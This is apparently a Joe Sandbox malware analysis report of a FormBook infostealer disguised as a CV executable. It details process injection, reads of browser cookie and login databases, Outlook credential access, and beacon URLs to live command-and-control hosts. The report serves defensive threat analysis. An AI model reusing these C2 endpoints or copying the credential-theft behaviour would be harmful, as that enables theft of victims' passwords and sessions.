Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: NULL target: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: NULL target: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\wlanext.exe

Thread register set: target process: 4180

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\wlanext.exe

Thread APC queued: target process: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 31AB008

Jump to behavior

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0032B106 LogonUserW,

0_2_0032B106

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_002F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_002F3D19

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0033411C SendInput,keybd_event,

0_2_0033411C

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_003374BB mouse_event,

0_2_003374BB

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe"	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

0_2_0032A66C

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_003371FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_003371FA

Source: CV_ Filipa Barbosa.exe, KzlgpZBFalChd.exe, 00000005.00000002.2998252813.0000000001060000.00000002.00000001.00040000.00000000.sdmp, KzlgpZBFalChd.exe, 00000005.00000000.2081066613.0000000001060000.00000002.00000001.00040000.00000000.sdmp, KzlgpZBFalChd.exe, 00000007.00000000.2223943952.0000000001B51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: KzlgpZBFalChd.exe, 00000005.00000002.2998252813.0000000001060000.00000002.00000001.00040000.00000000.sdmp, KzlgpZBFalChd.exe, 00000005.00000000.2081066613.0000000001060000.00000002.00000001.00040000.00000000.sdmp, KzlgpZBFalChd.exe, 00000007.00000000.2223943952.0000000001B51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: CV_ Filipa Barbosa.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: KzlgpZBFalChd.exe, 00000005.00000002.2998252813.0000000001060000.00000002.00000001.00040000.00000000.sdmp, KzlgpZBFalChd.exe, 00000005.00000000.2081066613.0000000001060000.00000002.00000001.00040000.00000000.sdmp, KzlgpZBFalChd.exe, 00000007.00000000.2223943952.0000000001B51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: KzlgpZBFalChd.exe, 00000005.00000002.2998252813.0000000001060000.00000002.00000001.00040000.00000000.sdmp, KzlgpZBFalChd.exe, 00000005.00000000.2081066613.0000000001060000.00000002.00000001.00040000.00000000.sdmp, KzlgpZBFalChd.exe, 00000007.00000000.2223943952.0000000001B51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_003165C4 cpuid

0_2_003165C4

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0034091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0034091D

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0036B340 GetUserNameW,

0_2_0036B340

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00321E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00321E8E

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0030DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0030DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2998690477.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2998739243.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2156547508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158110469.0000000006190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2998584831.00000000027D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2157416281.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2997273586.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3000295017.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\wlanext.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: CV_ Filipa Barbosa.exe	Binary or memory string: WIN_81
Source: CV_ Filipa Barbosa.exe	Binary or memory string: WIN_XP
Source: CV_ Filipa Barbosa.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: CV_ Filipa Barbosa.exe	Binary or memory string: WIN_XPe
Source: CV_ Filipa Barbosa.exe	Binary or memory string: WIN_VISTA
Source: CV_ Filipa Barbosa.exe	Binary or memory string: WIN_7
Source: CV_ Filipa Barbosa.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2998690477.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2998739243.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2156547508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158110469.0000000006190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2998584831.00000000027D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2157416281.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2997273586.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3000295017.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00348C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00348C4F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0034923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0034923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CV_ Filipa Barbosa.exe	71%	ReversingLabs	Win32.Trojan.AutoitInject
CV_ Filipa Barbosa.exe	36%	Virustotal		Browse
CV_ Filipa Barbosa.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
wcq77.top	0%	Virustotal	Browse
logidant.xyz	2%	Virustotal	Browse
www.bienmaigrir.info	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.logidant.xyz/ctvu/?UH=306z4jMFZ8cLvHYZzZU9cUs0vQ86MCVOzz9oMF1ntEZl1SQIBC+VKPA8lqMh/UdrcskgnhZVBAq8zTFw0YpHZLk0gMEW/A5vkbohwDElcVcFHGXrgZJpQIM=&E2ThV=44spoH	0%	Avira URL Cloud	safe
http://www.mindfulmo.life/grm8/?UH=LXeIWcjRI+0vwDaWL9fWp1e5SYfZj51vPQ+DeJcDhGcq3DSHHwCG/Mepb2eQXiRJ2aihtUY8szHS/Cbz5IjtUJQdZlknt7OQMPZ7VewdY2i1/aDXKfCCmB0=&E2ThV=44spoH	0%	Avira URL Cloud	safe
http://www.logidant.xyz/ctvu/	0%	Avira URL Cloud	safe
http://www.bienmaigrir.info/z7sc/	0%	Avira URL Cloud	safe
http://www.mindfulmo.life/grm8/	0%	Avira URL Cloud	safe
http://www.bienmaigrir.info	0%	Avira URL Cloud	safe
http://www.bienmaigrir.info/z7sc/?UH=lpyE2AbPqI/20nbLdgQLpDIVfBauxh+/nj7uqY0yeMpYT6Ph3E36c6D0EpnRPNVSfUYtH00jj9MWE9I4iZUmSEZjfY8EepRiDIFeNjKsgcauBuStZyRsOkE=&E2ThV=44spoH	0%	Avira URL Cloud	safe
http://www.wcq77.top/bryf/	0%	Avira URL Cloud	safe
http://www.wcq77.top/bryf/?UH=CAZjXQbNTKeWQTQirDs1igUBzSQld6T1UeVU1dDfkJwpgmj9+23WxzoueliXKU0GrnZ7rAlARHmYQrQtVPfpR7ul/yvYu09c5TuBMIpg21kSx+UgpigqKqQ=&E2ThV=44spoH	0%	Avira URL Cloud	safe
http://www.1secondlending.one/alo6/?UH=s1RhBgSSc/k3T0jZ1doZ5DvPRukmOUUc25RslsirlG2uVcm1vZZrQ7zhNnD/cyUNeUvgDkKIi8l9eWRRC/1ChPSgyQz5bywIt0FyKoJ7XnLAe/FH9kjFmmE=&E2ThV=44spoH	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wcq77.top	154.23.184.194	true	false	0%, Virustotal, Browse	unknown
www.mindfulmo.life	209.74.77.108	true	false		unknown
logidant.xyz	45.141.156.114	true	true	2%, Virustotal, Browse	unknown
www.bienmaigrir.info	35.220.176.144	true	false	0%, Virustotal, Browse	unknown
www.1secondlending.one	43.205.198.29	true	false		unknown
www.logidant.xyz	unknown	unknown	true		unknown
www.wcq77.top	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.logidant.xyz/ctvu/?UH=306z4jMFZ8cLvHYZzZU9cUs0vQ86MCVOzz9oMF1ntEZl1SQIBC+VKPA8lqMh/UdrcskgnhZVBAq8zTFw0YpHZLk0gMEW/A5vkbohwDElcVcFHGXrgZJpQIM=&E2ThV=44spoH	false	Avira URL Cloud: safe	unknown
http://www.mindfulmo.life/grm8/?UH=LXeIWcjRI+0vwDaWL9fWp1e5SYfZj51vPQ+DeJcDhGcq3DSHHwCG/Mepb2eQXiRJ2aihtUY8szHS/Cbz5IjtUJQdZlknt7OQMPZ7VewdY2i1/aDXKfCCmB0=&E2ThV=44spoH	false	Avira URL Cloud: safe	unknown
http://www.wcq77.top/bryf/	false	Avira URL Cloud: safe	unknown
http://www.1secondlending.one/alo6/?UH=s1RhBgSSc/k3T0jZ1doZ5DvPRukmOUUc25RslsirlG2uVcm1vZZrQ7zhNnD/cyUNeUvgDkKIi8l9eWRRC/1ChPSgyQz5bywIt0FyKoJ7XnLAe/FH9kjFmmE=&E2ThV=44spoH	false	Avira URL Cloud: safe	unknown
http://www.mindfulmo.life/grm8/	false	Avira URL Cloud: safe	unknown
http://www.bienmaigrir.info/z7sc/?UH=lpyE2AbPqI/20nbLdgQLpDIVfBauxh+/nj7uqY0yeMpYT6Ph3E36c6D0EpnRPNVSfUYtH00jj9MWE9I4iZUmSEZjfY8EepRiDIFeNjKsgcauBuStZyRsOkE=&E2ThV=44spoH	false	Avira URL Cloud: safe	unknown
http://www.logidant.xyz/ctvu/	false	Avira URL Cloud: safe	unknown
http://www.wcq77.top/bryf/?UH=CAZjXQbNTKeWQTQirDs1igUBzSQld6T1UeVU1dDfkJwpgmj9+23WxzoueliXKU0GrnZ7rAlARHmYQrQtVPfpR7ul/yvYu09c5TuBMIpg21kSx+UgpigqKqQ=&E2ThV=44spoH	false	Avira URL Cloud: safe	unknown
http://www.bienmaigrir.info/z7sc/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.bienmaigrir.info	KzlgpZBFalChd.exe, 00000007.00000002.3000295017.000000000591B000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.141.156.114	logidant.xyz	Germany	30860	YURTEH-ASUA	true
209.74.77.108	www.mindfulmo.life	United States	31744	MULTIBAND-NEWHOPEUS	false
43.205.198.29	www.1secondlending.one	Japan	4249	LILLY-ASUS	false
154.23.184.194	wcq77.top	United States	174	COGENT-174US	false
35.220.176.144	www.bienmaigrir.info	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561726
Start date and time:	2024-11-24 08:04:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CV_ Filipa Barbosa.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@6/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 53 Number of non-executed functions: 293
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
02:06:25	API Interceptor	1075380x Sleep call for process: wlanext.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.141.156.114	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
45.141.156.114	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
209.74.77.108	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	www.hobbihub.info/i5gf/
209.74.77.108	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mindfulmo.life/grm8/
43.205.198.29	Project Breakdown Doc.exe	Get hash	malicious	FormBook	Browse	www.1secondlending.one/6pwo/
154.23.184.194	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.wcq77.top/bryf/
	Bill Of Lading_MEDUVB935991.pdf.exe	Get hash	malicious	FormBook	Browse	www.d81dp.top/9m01/
	AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Get hash	malicious	FormBook	Browse	www.d81dp.top/9m01/
	L7mZZNG72D.exe	Get hash	malicious	FormBook	Browse	www.d22dg.top/9vu9/
	FATURALAR PDF.exe	Get hash	malicious	FormBook	Browse	www.86ddv.top/t0ud/
	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	www.86ddv.top/6jhj/
	toeORRsgUX.exe	Get hash	malicious	FormBook	Browse	www.d34dq.top/2whe/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.mindfulmo.life	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
www.1secondlending.one	Project Breakdown Doc.exe	Get hash	malicious	FormBook	Browse	43.205.198.29
www.1secondlending.one	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	43.205.198.29

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	204.77.18.147
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.24.59.144
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.200.234.198
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.85.133.234
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.251.1.250
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.116.131.10
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.134.93.88
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.255.28.227
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	149.18.139.110
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	149.54.59.77
LILLY-ASUS	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	43.149.158.70
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	40.3.116.231
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	40.7.101.70
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	43.93.107.173
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	40.23.228.72
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	43.124.232.40
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	40.0.134.71
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	42.167.107.237
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	43.36.161.142
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	43.27.90.166
YURTEH-ASUA	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	support.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	31.42.187.210
	support.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	31.42.187.210
	SI HE Voy - TC Relet 11.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	152.89.61.240
	MV ALEXOS_VESSEL'S DESC.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	152.89.61.240
	https://r2.ddlnk.net/c/AQj0-RUQuwkYipioASC0cRmrHeGLBOb7t9m7_CWaa81LkCY1aSe2ilmnvwK5PXzQ	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://campaign-statistics.com/link_click/OOIhh4OKHe_NcHPG/8cb76dcdebff138ed04c1331049114e6	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://campaign-statistics.com/link_click/ODQJBme7yo_NcFtX/22e0ea1236db29f11ee5970fcc1e783c	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://discountdays.ru/	Get hash	malicious	Unknown	Browse	31.42.186.237
MULTIBAND-NEWHOPEUS	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	PO #2411071822.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	Quotation.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	payments.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
	http://mt6j71.p1keesoulharmony.com/	Get hash	malicious	HTMLPhisher, EvilProxy	Browse	209.74.95.101
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	https://hmjpvx0wn1.gaimensebb.shop/	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	209.74.95.101

Process:	C:\Windows\SysWOW64\wlanext.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
